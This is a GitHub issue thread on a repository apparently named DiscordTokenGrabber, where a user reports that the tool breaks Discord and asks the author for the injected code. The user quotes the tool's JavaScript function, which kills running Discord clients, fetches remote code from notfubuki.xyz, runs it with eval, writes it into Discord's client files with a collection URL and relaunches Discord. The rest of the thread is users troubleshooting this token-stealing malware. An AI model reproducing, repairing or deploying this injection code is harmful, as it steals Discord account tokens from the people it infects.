### ISSUE TITLE
something is broken

### ISSUE THREAD

**Issue by Pluzdev** [NotFubukIl/DiscordTokenGrabber#2]
Hello
Something is broken i think:
```
async function injectToDiscord() {
       getInstalledDiscord()
        killAllDiscords()
        injected()
        var r = await eval(await fetch("https://notfubuki.xyz/api/waifuware", { headers: { waifu: true }})).text()
        JSPath.forEach(f => fs.writeFileSync(f, r.replace("*API URL*", apiURL)) ^ execSync(`${local}/${f.split("/")[5]}/Update.exe --processStart ${f.split("/")[5]}.exe`))
}
```
when i launch the client file, discord got broken.
I think it's [](https://notfubuki.xyz/api/waifuware)  is broken

**Comment by Pluzdev** [comment]
Is it possible to know what this API is used for?

**Comment by NotFubukIl** [comment]
the api is used to get the inject content, for the moment it's down, the 7 of August it will come back

**Comment by Pluzdev** [comment]
Okay, 
Would it be possible to give me the injected code?
That way I can host it on my own machine
Thank you

**Comment by NotFubukIl** [comment]
no.

**Comment by Pluzdev** [comment]
The Api il broken again.
If you want I host it for you dm me 
P.#6969

**Comment by TaxMachine** [comment]
mao.
